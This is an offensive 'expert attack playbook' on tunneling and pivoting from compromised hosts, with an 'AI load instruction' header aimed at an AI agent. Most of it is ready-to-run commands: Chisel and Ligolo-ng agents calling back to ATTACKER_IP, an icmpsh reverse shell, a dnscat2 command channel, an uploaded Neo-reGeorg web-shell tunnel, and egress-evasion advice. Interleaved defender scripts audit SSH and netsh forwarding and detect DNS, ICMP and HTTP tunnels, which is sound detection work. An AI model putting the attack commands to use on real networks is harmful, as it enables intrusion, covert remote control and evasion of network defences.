tunneling-and-pivoting

SKILL: Tunneling & Pivoting — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup.

0. RELATED ROUTING

Before going deep, consider loading:
  • network-protocol-attacks for network-level attacks from pivot positions
  • reverse-shell-techniques for establishing initial access shells
  • unauthorized-access-common-services for exploiting services discovered through pivots
  • linux-privilege-escalation or windows-privilege-escalation after pivoting to new hosts

1. SSH TUNNELING

Local Port Forward

Forward a local port to a remote service through the pivot.

```bash
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N

# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N

# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
```

Remote Port Forward

Expose a local service to the pivot host's network.

```bash
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N

# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
```

Dynamic Port Forward (SOCKS Proxy)

```bash
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24

# Or with browser SOCKS proxy → browse internal web apps
```

Jump Host (ProxyJump)

```bash
# Single jump
ssh -J jumphost user@TARGET

# Multiple jumps
ssh -J jump1,jump2 user@TARGET
```

SSH config for persistent jump (`~/.ssh/config`):

```
Host internal-target
    HostName 10.10.10.100
    User admin
    ProxyJump user@jumphost.example.com
```
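A defender-side check, added here and not part of the playbook: the script parses an sshd_config (a constructed sample) and reports the forwarding directives that the -L, -R and -D forwards above depend on. A -R bind to 0.0.0.0 on the pivot only takes effect when that host's sshd sets GatewayPorts to yes or clientspecified; the OpenSSH defaults and the hardened values in the table are the only assumptions.

```python
# Added example (not the playbook's code): audit sshd_config for the directives
# that SSH local/remote/dynamic forwards rely on. OpenSSH defaults assumed:
# AllowTcpForwarding yes, GatewayPorts no, PermitTunnel no, AllowAgentForwarding yes.
import re

# directive -> (OpenSSH default when unset, value a hardened bastion should set)
FORWARDING_DIRECTIVES = {
    "allowtcpforwarding": ("yes", "no"),   # needed for -L, -R and -D
    "gatewayports": ("no", "no"),          # lets -R bind 0.0.0.0 on the pivot
    "permittunnel": ("no", "no"),          # ssh -w tun/tap tunnels
    "allowagentforwarding": ("yes", "no"),
}

def parse_sshd_config(text):
    """Return {directive: value} (lower-cased) for the global section only.
    Parsing stops at the first Match block, whose settings are conditional;
    as in sshd, the first occurrence of a directive wins."""
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        effective.setdefault(key, parts[1].strip().lower() if len(parts) > 1 else "")
    return effective

def audit_forwarding(text):
    """Return [(directive, effective_value, recommended_value)] for every
    forwarding directive that is looser than the hardened value."""
    cfg = parse_sshd_config(text)
    findings = []
    for directive, (default, recommended) in FORWARDING_DIRECTIVES.items():
        effective = cfg.get(directive, default)   # unset -> OpenSSH default
        if effective != recommended:
            findings.append((directive, effective, recommended))
    return findings

# Constructed sample: a jump host that permits every forward shown above.
SAMPLE_SSHD_CONFIG = """\
# clientspecified lets the client pick the bind address for -R forwards
GatewayPorts clientspecified
AllowTcpForwarding yes
PermitTunnel no
Match User deploy
    AllowTcpForwarding no
"""
```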

---

2. CHISEL

Reverse SOCKS Proxy (Most Common)

```bash
# Attacker: start chisel server
chisel server --reverse --port 8080

# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks

# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
```

Port Forwarding

```bash
# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306

# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80

# Reverse port forward (expose attacker service to victim network)
# An R: remote listens on the server (attacker) side, so a plain remote is
# needed here: the client listens on 0.0.0.0:4444 and forwards to the
# server's 127.0.0.1:4444.
chisel client ATTACKER:8080 0.0.0.0:4444:127.0.0.1:4444
```

---

3. LIGOLO-NG

TUN interface-based pivoting — transparent routing without SOCKS.

```bash
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert

# In ligolo-proxy console:
session     # select agent session
ifconfig    # view agent's network interfaces
start       # start tunnel

# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
```

Listener (Reverse Shell Catcher Through Pivot)

```bash
# In ligolo-proxy console:
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
```

Double Pivot

```bash
# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo      # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo    # via agent 2
```

---

4. SOCAT

```bash
# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80

# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53

# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80

# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file
```

---

5. PROXYCHAINS / PROXIFIER

ProxyChains Configuration

```ini
# /etc/proxychains4.conf
strict_chain        # fail if any proxy is down
# dynamic_chain     # skip dead proxies
# random_chain      # randomize proxy order

[ProxyList]
socks5 127.0.0.1 1080    # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081    # second hop (if chaining)
```

```bash
# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
```

---

6. WINDOWS PIVOTING

Netsh Port Forwarding

```cmd
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

:: List forwards
netsh interface portproxy show all

:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
```

Plink (PuTTY CLI)

```cmd
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER

:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER

:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER
```
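An added host-audit check, not from the playbook: parse the output of `netsh interface portproxy show all` (the sample is constructed) and flag rules that listen on every interface or relay to another host, which is exactly what the `add v4tov4` command above creates. Portproxy rules survive reboots, so they belong in a periodic review.

```python
# Added example (not the playbook's code): parse `netsh interface portproxy
# show all` text and flag rules that relay traffic to another host.
# The column layout and the sample below are constructed from memory.
import re
from ipaddress import ip_address

PORTPROXY_ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

def parse_portproxy(output):
    """Return (listen_addr, listen_port, connect_addr, connect_port) per rule;
    the 'Listen on ipv4:' banner, column headers and dashes never match."""
    rows = []
    for line in output.splitlines():
        m = PORTPROXY_ROW.match(line)
        if m:
            rows.append((m[1], int(m[2]), m[3], int(m[4])))
    return rows

def is_loopback(addr):
    try:
        return ip_address(addr).is_loopback
    except ValueError:
        return False   # a hostname is treated as remote

def suspicious_forwards(output):
    """Flag rules that listen on every interface or that connect to a host
    other than this machine: the shape of the add v4tov4 rule above.
    Loopback-to-loopback rules are left alone."""
    return [r for r in parse_portproxy(output)
            if r[0] in ("0.0.0.0", "*") or not is_loopback(r[2])]

SAMPLE_NETSH_OUTPUT = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        10.10.10.5      80
127.0.0.1       3389        127.0.0.1       3389
127.0.0.1       9000        fileserver01    445
"""
```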

7. DNS TUNNELING

```bash
# iodine — IP-over-DNS
# Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
# Client (victim):
iodine -f -P password t1.yourdomain.com
# Creates dns0 interface → route traffic through it

# dnscat2 — command channel over DNS
# Server:
ruby dnscat2.rb yourdomain.com
# Client:
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET
```
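An added detection example, not from the playbook: iodine and dnscat2 both carry data in the query name, so one client emits a stream of long, never-repeating labels under a single zone, typically with NULL/TXT/CNAME/MX queries. The script profiles a simplified resolver log (constructed format and sample; the zone split and thresholds are assumptions) and returns the client/zone pairs that fit that pattern.

```python
# Added example (not the playbook's code): profile a resolver log for the
# shape of iodine/dnscat2 traffic. The '<client> <qname> <qtype>' format, the
# sample, the zone split and the thresholds are constructed assumptions.
from collections import defaultdict

# Record types that carry more data per answer; iodine and dnscat2 favour them.
TUNNEL_FRIENDLY_TYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}

def registrable_zone(qname, depth=2):
    """Simplification: the last two labels are treated as the zone."""
    return ".".join(qname.rstrip(".").split(".")[-depth:])

def profile_dns_log(text):
    """Per (client, zone): query count, set of qnames, summed length of the
    leftmost label, and how many queries used a tunnel-friendly type."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(),
                                 "label_len": 0, "tunnel_types": 0})
    for line in text.splitlines():
        if not line.strip():
            continue
        client, qname, qtype = line.split()
        s = stats[(client, registrable_zone(qname))]
        s["queries"] += 1
        s["names"].add(qname)
        s["label_len"] += len(qname.split(".")[0])
        s["tunnel_types"] += qtype.upper() in TUNNEL_FRIENDLY_TYPES
    return stats

def tunnel_candidates(text, min_queries=5, min_label_len=30, min_type_share=0.5):
    """Return (client, zone) pairs whose queries look like encoded data:
    enough volume, long leftmost labels, mostly bulky record types, and a
    name that never repeats (a cached answer is useless to a tunnel)."""
    out = []
    for key, s in profile_dns_log(text).items():
        n = s["queries"]
        if (n >= min_queries and s["label_len"] / n >= min_label_len
                and s["tunnel_types"] / n >= min_type_share
                and len(s["names"]) == n):
            out.append(key)
    return out

SAMPLE_DNS_LOG = """\
10.10.10.42 www.example.com A
10.10.10.42 0aj8qxk2v9f7e1m3n5p7r9t1v3x5z7b9d1f3h5j7l9n1p3r5.t1.yourdomain.com NULL
10.10.10.42 1bk9ryl3w0g8f2n4o6q8s0u2w4y6a8c0e2g4i6k8m0o2q4s6.t1.yourdomain.com NULL
10.10.10.42 2cl0szm4x1h9g3o5p7r9t1v3x5z7b9d1f3h5j7l9n1p3r5t7.t1.yourdomain.com NULL
10.10.10.42 3dm1tan5y2i0h4p6q8s0u2w4y6a8c0e2g4i6k8m0o2q4s6u8.t1.yourdomain.com TXT
10.10.10.42 4en2ubo6z3j1i5q7r9t1v3x5z7b9d1f3h5j7l9n1p3r5t7v9.t1.yourdomain.com NULL
10.10.10.43 mail.example.com A
"""
```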

---

8. ICMP TUNNELING

```bash
# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
# Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
# Victim (Windows):
icmpsh.exe -t ATTACKER_IP

# ptunnel-ng — TCP-over-ICMP
# Server:
ptunnel-ng -r INTERNAL_HOST -R 22
# Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22
ssh -p 2222 user@127.0.0.1
```
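An added detection example, not from the playbook: ptunnel-ng and icmpsh both put their data in the echo-request payload, so the payload length follows the tunnelled data instead of a ping client's fixed default. The script summarises constructed ICMP flow records and flags source/destination pairs with a sustained stream of non-standard or varying payload sizes; the record format, sizes and thresholds are assumptions.

```python
# Added example (not the playbook's code): flag ICMP echo streams whose
# payload sizes follow tunnelled data rather than a ping client's default.
# Record format '<src> <dst> <icmp_type> <payload_bytes>', the sample and the
# thresholds are constructed assumptions.
from collections import defaultdict

NORMAL_PAYLOAD_SIZES = {32, 56, 64}   # Windows ping, Linux ping, common defaults

def summarize_echo_requests(text):
    """Return {(src, dst): [payload sizes]} for ICMP type 8 (echo request)."""
    per_pair = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, icmp_type, size = line.split()
        if icmp_type == "8":
            per_pair[(src, dst)].append(int(size))
    return per_pair

def icmp_tunnel_candidates(text, min_packets=5, max_normal_share=0.5):
    """Return [((src, dst), packets, max_payload)] for pairs with a sustained
    echo-request stream whose sizes are mostly non-standard or keep changing.
    ptunnel-ng carries TCP segments and icmpsh carries shell I/O in the
    payload, so the length tracks the data instead of staying fixed."""
    out = []
    for pair, sizes in summarize_echo_requests(text).items():
        if len(sizes) < min_packets:
            continue
        normal_share = sum(s in NORMAL_PAYLOAD_SIZES for s in sizes) / len(sizes)
        if normal_share <= max_normal_share or len(set(sizes)) >= 3:
            out.append((pair, len(sizes), max(sizes)))
    return out

SAMPLE_ICMP_RECORDS = """\
10.10.10.42 203.0.113.10 8 56
10.10.10.42 203.0.113.10 8 56
10.10.10.42 203.0.113.10 8 56
10.10.10.42 203.0.113.10 8 56
10.10.10.42 203.0.113.10 8 56
10.10.10.43 203.0.113.10 8 1024
10.10.10.43 203.0.113.10 8 812
10.10.10.43 203.0.113.10 8 1024
10.10.10.43 203.0.113.10 8 77
10.10.10.43 203.0.113.10 8 1024
10.10.10.43 203.0.113.10 8 640
10.10.10.44 10.10.10.1 8 32
"""
```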

---

9. HTTP TUNNELING

```bash
# Neo-reGeorg — SOCKS proxy via web shell
# Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
# Upload tunnel.php/aspx/jsp to target web server
# Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
# SOCKS proxy on 127.0.0.1:1080

# Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP
```
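An added detection example, not from the playbook: the Neo-reGeorg and Tunna clients turn each tunnelled connection into a burst of POST requests to the single uploaded script, so one client POSTing almost exclusively to one server-side script stands out in the access log. The script parses combined-format lines (constructed sample; the script-extension list and thresholds are assumptions).

```python
# Added example (not the playbook's code): find a reGeorg/Tunna-style session
# in a web server access log. The combined log lines below are constructed;
# the extension list and the thresholds are assumptions.
import re
from collections import defaultdict

ACCESS_ROW = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
SCRIPT_SUFFIXES = (".php", ".aspx", ".ashx", ".jsp", ".jspx")

def parse_access_log(text):
    """Return (client, method, path_without_query, status) per parseable line."""
    rows = []
    for line in text.splitlines():
        m = ACCESS_ROW.match(line)
        if m:
            rows.append((m[1], m[3], m[4].split("?")[0], int(m[5])))
    return rows

def http_tunnel_candidates(text, min_requests=5, min_post_share=0.8):
    """Return [(client, path, requests)] where one client sent at least
    min_requests to one script and at least min_post_share of them were POSTs;
    a browser spreads its requests over many paths, a tunnel client does not."""
    totals, posts = defaultdict(int), defaultdict(int)
    for client, method, path, _ in parse_access_log(text):
        if not path.lower().endswith(SCRIPT_SUFFIXES):
            continue
        totals[(client, path)] += 1
        posts[(client, path)] += method == "POST"
    return [(c, p, n) for (c, p), n in totals.items()
            if n >= min_requests and posts[(c, p)] / n >= min_post_share]

SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:02 +0000] "GET /css/site.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/tunnel.php HTTP/1.1" 200 14 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 14 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 1460 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 392 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 1460 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /uploads/tunnel.php HTTP/1.1" 200 88 "-" "python-requests/2.31"
"""
```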

---

10. PIVOTING DECISION MATRIX

| Egress Allowed | Tool | Notes |
|---|---|---|
| TCP outbound (any port) | Chisel, Ligolo-ng, SSH | Fastest setup |
| TCP 80/443 only | Chisel (HTTP/S), Neo-reGeorg | Blend with web traffic |
| DNS only (53/udp) | iodine, dnscat2 | Slow but stealthy |
| ICMP only | ptunnel-ng, icmpsh | Very restricted environments |
| No outbound | Bind shell + port forward in | Needs inbound access to pivot |
| Web shell only | Neo-reGeorg, Tunna | When only HTTP file upload works |

11. DECISION TREE

```
Compromised host — need to reach internal network
├── Can install tools on pivot?
│   ├── YES + outbound TCP allowed?
│   │   ├── Need transparent routing? → Ligolo-ng (§3)
│   │   ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│   │   └── SSH available? → SSH dynamic forward (§1)
│   │
│   ├── YES + only HTTP(S) outbound?
│   │   ├── Chisel over HTTPS (§2)
│   │   └── Upload web tunnel → Neo-reGeorg (§9)
│   │
│   ├── YES + only DNS outbound?
│   │   └── iodine or dnscat2 (§7)
│   │
│   └── YES + only ICMP allowed?
│       └── ptunnel-ng or icmpsh (§8)
├── Cannot install tools (web shell only)?
│   └── Neo-reGeorg / Tunna via web shell (§9)
├── Windows pivot?
│   ├── Admin access? → netsh portproxy (§6)
│   ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│   └── Outbound SSH? → plink (§6)
├── Need multi-layer pivot?
│   ├── Ligolo-ng: multiple agents + route stacking (§3)
│   ├── SSH ProxyJump chaining (§1)
│   └── ProxyChains with multiple SOCKS (§5)
└── Teammate needs access too?
    ├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
    └── Share Ligolo-ng routes via common proxy
```